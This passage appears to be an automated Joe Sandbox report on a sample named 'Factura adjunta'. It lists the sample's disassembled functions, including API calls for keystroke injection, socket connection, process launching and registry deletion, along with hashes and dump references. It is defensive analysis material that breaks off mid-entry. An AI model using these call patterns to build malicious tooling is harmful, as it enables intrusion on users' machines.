                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0081744C
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00817461
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00817480
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                            • String ID:
                            • API String ID: 256516436-0
                            • Opcode ID: 54edaddc1893ff7d79353bd2b86e7b8eca57f166264642d8f0affba2d7e5044a
                            • Instruction ID: 1de4a17411e1f0d3bbe2e26ef157beb5a5c7fdfbc377bf918cf7af740b433e46
                            • Opcode Fuzzy Hash: 54edaddc1893ff7d79353bd2b86e7b8eca57f166264642d8f0affba2d7e5044a
                            • Instruction Fuzzy Hash: 09317031904205EBCF10EF94DC89AAF7B78FF44710B1441AAF904DB256DB749A54CBA4
                            Function 00836442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 0083645A
                            • GetDC.USER32(00000000), ref: 00836462
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0083646D
                            • ReleaseDC.USER32(00000000,00000000), ref: 00836479
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008364B5
                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008364C6
                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00839299,?,?,000000FF,00000000,?,000000FF,?), ref: 00836500
                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00836520
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                            • String ID:
                            • API String ID: 3864802216-0
                            • Opcode ID: b710be9c6a6d7f8db2ec0c120d2bddfc3f3e91fca98b5bacb6ea801082a24fc3
                            • Instruction ID: 7c776c0f03f06d7cf1a2134cb6b414dda2dcac60b43134597186f555849524db
                            • Opcode Fuzzy Hash: b710be9c6a6d7f8db2ec0c120d2bddfc3f3e91fca98b5bacb6ea801082a24fc3
                            • Instruction Fuzzy Hash: 11318D72601210BFEB118F14CC8AFEA3FA9FF89761F044065FE08DA192E7759851CBA4
                            Function 0080C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memcmp
                            • String ID:
                            • API String ID: 2931989736-0
                            • Opcode ID: 8bc876f6cc55435a9d9692f021b82ddb235ea78c1ef5477cc79e9aa735bfd8a7
                            • Instruction ID: 2a199aa4df9cede106c7a612f007fad822b4ecc5203a4b65f32506f0d1d21af1
                            • Opcode Fuzzy Hash: 8bc876f6cc55435a9d9692f021b82ddb235ea78c1ef5477cc79e9aa735bfd8a7
                            • Instruction Fuzzy Hash: 7B21B071A05609FBD290AF218C46FAB37ADFF203A8B840121FD05D63C3EB59DE11C1A5
                            Function 0081D7F8 Relevance: 10.8, APIs: 7, Instructions: 283COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B9997: __itow.LIBCMT ref: 007B99C2
                              • Part of subcall function 007B9997: __swprintf.LIBCMT ref: 007B9A0C
                            • CoInitialize.OLE32(00000000), ref: 0081D855
                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0081D8E8
                            • SHGetDesktopFolder.SHELL32(?), ref: 0081D8FC
                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0081D9B7
                            • _memset.LIBCMT ref: 0081DA4C
                            • SHBrowseForFolderW.SHELL32(?), ref: 0081DA88
                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0081DAAB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Folder$BrowseCreateDesktopFromInitializeItemListLocationPathShellSpecial__itow__swprintf_memset
                            • String ID:
                            • API String ID: 3008154123-0
                            • Opcode ID: f7dbf157c4acd0c9aded5a23aa5c74f996318438ea5923b3c40d437aa3f8e20e
                            • Instruction ID: ecc3711237b174218ce0f3d5243e27f0f7be6414baf8a31f52d16f61d398f0ce
                            • Opcode Fuzzy Hash: f7dbf157c4acd0c9aded5a23aa5c74f996318438ea5923b3c40d437aa3f8e20e
                            • Instruction Fuzzy Hash: 23B1EC75A00219EFDB04DF64C888EAEBBB9FF88314B148469F519EB261DB34ED45CB50
                            Function 007B1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: db4e4dd3011c18f41c541c3d5491d4dcb6eb9bc0ad959ae93266532ee5ff1fda
                            • Instruction ID: 131cd014fe263108943815a8582a0277668a6df2a7928fcc7c6d583e652e140a
                            • Opcode Fuzzy Hash: db4e4dd3011c18f41c541c3d5491d4dcb6eb9bc0ad959ae93266532ee5ff1fda
                            • Instruction Fuzzy Hash: CD716D30900149EFCB15CF98CC98AFFBB79FF85310F908159F915AA251D738AA51CBA0
                            Function 008286D0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 197COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B9997: __itow.LIBCMT ref: 007B99C2
                              • Part of subcall function 007B9997: __swprintf.LIBCMT ref: 007B9A0C
                            • CoInitialize.OLE32 ref: 00828718
                            • VariantInit.OLEAUT32(?), ref: 00828890
                            • VariantClear.OLEAUT32(?), ref: 008288F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Variant$ClearInitInitialize__itow__swprintf
                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                            • API String ID: 4106155388-1287834457
                            • Opcode ID: 8d8771f78d1dc3f4a533a9894d1a5553c13c88523da8e669d6614336bd217411
                            • Instruction ID: d8943601b830b9423817b3aba6da562ec96fa6969f350d93a56003fea40819a4
                            • Opcode Fuzzy Hash: 8d8771f78d1dc3f4a533a9894d1a5553c13c88523da8e669d6614336bd217411
                            • Instruction Fuzzy Hash: 72617B70609321DFDB10DF24D848B5ABBE8FF84714F104829FA95DB291CB74E984CB92
                            Function 0082F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 0082F75C
                            • _memset.LIBCMT ref: 0082F825
                            • ShellExecuteExW.SHELL32(?), ref: 0082F86A
                              • Part of subcall function 007B9997: __itow.LIBCMT ref: 007B99C2
                              • Part of subcall function 007B9997: __swprintf.LIBCMT ref: 007B9A0C
                              • Part of subcall function 007CFEC6: _wcscpy.LIBCMT ref: 007CFEE9
                            • GetProcessId.KERNEL32(00000000), ref: 0082F8E1
                            • CloseHandle.KERNEL32(00000000), ref: 0082F910
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                            • String ID: @
                            • API String ID: 3522835683-2766056989
                            • Opcode ID: e341be6e97b430c15264f31f38d7e73078337f96ac939014414bc89e36e57bfd
                            • Instruction ID: ccc2587ef441ba29966bc2c815c342ffa823335fbd2fbbf82f49791e29865a3e
                            • Opcode Fuzzy Hash: e341be6e97b430c15264f31f38d7e73078337f96ac939014414bc89e36e57bfd
                            • Instruction Fuzzy Hash: 41618D75A00629DFCB14EF54D584AAEBBF5FF48310B148479EA56AB352CB34AD80CB90
                            Function 0081145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetParent.USER32(?), ref: 0081149C
                            • GetKeyboardState.USER32(?), ref: 008114B1
                            • SetKeyboardState.USER32(?), ref: 00811512
                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00811540
                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0081155F
                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 008115A5
                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008115C8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 1d1588bbd8fb0ca21d64ad6de51614ff575ffc111077354312973a80e09612e7
                            • Instruction ID: 4ff8c15dd1ad63df8069b388f79f79be7cfb2799b603d66ab39b0f32fd468540
                            • Opcode Fuzzy Hash: 1d1588bbd8fb0ca21d64ad6de51614ff575ffc111077354312973a80e09612e7
                            • Instruction Fuzzy Hash: 5C51F2A0A047D53EFF3242288C49BFABEAEBF46304F084889E2D5C58C2D7999CC4D751
                            Function 00811276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetParent.USER32(00000000), ref: 008112B5
                            • GetKeyboardState.USER32(?), ref: 008112CA
                            • SetKeyboardState.USER32(?), ref: 0081132B
                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00811357
                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00811374
                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008113B8
                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008113D9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 563a4775f8d69094494b547d88152abc2198da6450b80f05786a9d6a416f57f0
                            • Instruction ID: 2a26f12418beaaab923aaca274c84690d7764dbbc075dd42b682c0fbb98df37b
                            • Opcode Fuzzy Hash: 563a4775f8d69094494b547d88152abc2198da6450b80f05786a9d6a416f57f0
                            • Instruction Fuzzy Hash: 0751C1A09046D539FF3282248C49BFABFADBF06700F088589E2E5C6DC2D799ACD4D755
                            Function 0081589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _wcsncpy$LocalTime
                            • String ID:
                            • API String ID: 2945705084-0
                            • Opcode ID: 530798e52fb462eb95be66a55d8d0b8de76e81787d52af5dc5ec97149e9ca843
                            • Instruction ID: 6f2cf9884708e654d0d98e405921cfa7f05e4be9094afb31b0aff0fd3f15575c
                            • Opcode Fuzzy Hash: 530798e52fb462eb95be66a55d8d0b8de76e81787d52af5dc5ec97149e9ca843
                            • Instruction Fuzzy Hash: 4F4164A5C20518F6CB50E7B4C88A9CF77BCAF44720F508567E918E3212E638E755C7AA
                            Function 0083A2C5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID: h)
                            • API String ID: 0-3328819710
                            • Opcode ID: 265b350da779e40f5542887d20b713651e0c9e298a22341b9e0df1489eb6cd53
                            • Instruction ID: 620ef1a6a5ef8964c28e6b0225f9507ba6450f9bf9a2e15f83039f59d0438adf
                            • Opcode Fuzzy Hash: 265b350da779e40f5542887d20b713651e0c9e298a22341b9e0df1489eb6cd53
                            • Instruction Fuzzy Hash: 1A41C135900208AFD728DB28CC48FA9BBA8FB89310F144565F999E72E1D770AD51DAD2
                            Function 008138AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 008148AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008138D3,?), ref: 008148C7
                              • Part of subcall function 008148AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008138D3,?), ref: 008148E0
                            • lstrcmpiW.KERNEL32(?,?), ref: 008138F3
                            • _wcscmp.LIBCMT ref: 0081390F
                            • MoveFileW.KERNEL32(?,?), ref: 00813927
                            • _wcscat.LIBCMT ref: 0081396F
                            • SHFileOperationW.SHELL32(?), ref: 008139DB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                            • String ID: \*.*
                            • API String ID: 1377345388-1173974218
                            • Opcode ID: 170a4dc76fcfe97b076785786ed38279baababc9137a24e1e1d6f5d4275b041b
                            • Instruction ID: 70032ccae1f34007f924340ae7061abc8c0f8afc156e96e858a4efe426842f16
                            • Opcode Fuzzy Hash: 170a4dc76fcfe97b076785786ed38279baababc9137a24e1e1d6f5d4275b041b
                            • Instruction Fuzzy Hash: 62418FB14083849AC751EF64C485AEFBBECFF89340F00192EB489D3251EA75D689C752
                            Function 0083122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0083125C
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00831286
                            • FreeLibrary.KERNEL32(00000000), ref: 0083133D
                              • Part of subcall function 0083122D: RegCloseKey.ADVAPI32(?), ref: 008312A3
                              • Part of subcall function 0083122D: FreeLibrary.KERNEL32(?), ref: 008312F5
                              • Part of subcall function 0083122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00831318
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 008312E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                            • String ID:
                            • API String ID: 395352322-0
                            • Opcode ID: ab9601a8ad23fe7a18f25f784b94cea344599270e70438d3fe16f2a20d131a21
                            • Instruction ID: a5b01d2d21f746f669ecf144d46c48fcb09dd547f7a2f3ba9c3d9969fe1ea330
                            • Opcode Fuzzy Hash: ab9601a8ad23fe7a18f25f784b94cea344599270e70438d3fe16f2a20d131a21
                            • Instruction Fuzzy Hash: 9B3117B1901119BFDF15DB94EC99AFFB7BCFB48300F00056AE611E2251EB749E859AE0
                            Function 00826486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 008280A0: inet_addr.WS2_32(00000000), ref: 008280CB
                            • socket.WS2_32(00000002,00000001,00000006), ref: 008264D9
                            • WSAGetLastError.WS2_32(00000000), ref: 008264E8
                            • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00826521
                            • connect.WSOCK32(00000000,?,00000010), ref: 0082652A
                            • WSAGetLastError.WS2_32 ref: 00826534
                            • closesocket.WS2_32(00000000), ref: 0082655D
                            • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00826576
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                            • String ID:
                            • API String ID: 910771015-0
                            • Opcode ID: ca8a03b2cece9148e84bf01622fec3719b2291ad5411486abc0d20090493a6fa
                            • Instruction ID: 741fd11c04a5a81a5276ba5688651bb5a52ef1e876982ffaa85c8b8953128739
                            • Opcode Fuzzy Hash: ca8a03b2cece9148e84bf01622fec3719b2291ad5411486abc0d20090493a6fa
                            • Instruction Fuzzy Hash: 4431A131600128ABDB10AF24DC85BBE7BA8FF44714F008069FE45E7291DB74AD54CBA1
                            Function 0083783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007B1D73
                              • Part of subcall function 007B1D35: GetStockObject.GDI32(00000011), ref: 007B1D87
                              • Part of subcall function 007B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007B1D91
                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008378A1
                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008378AE
                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008378B9
                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008378C8
                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008378D4
                            Strings
                            Memory Dump Source
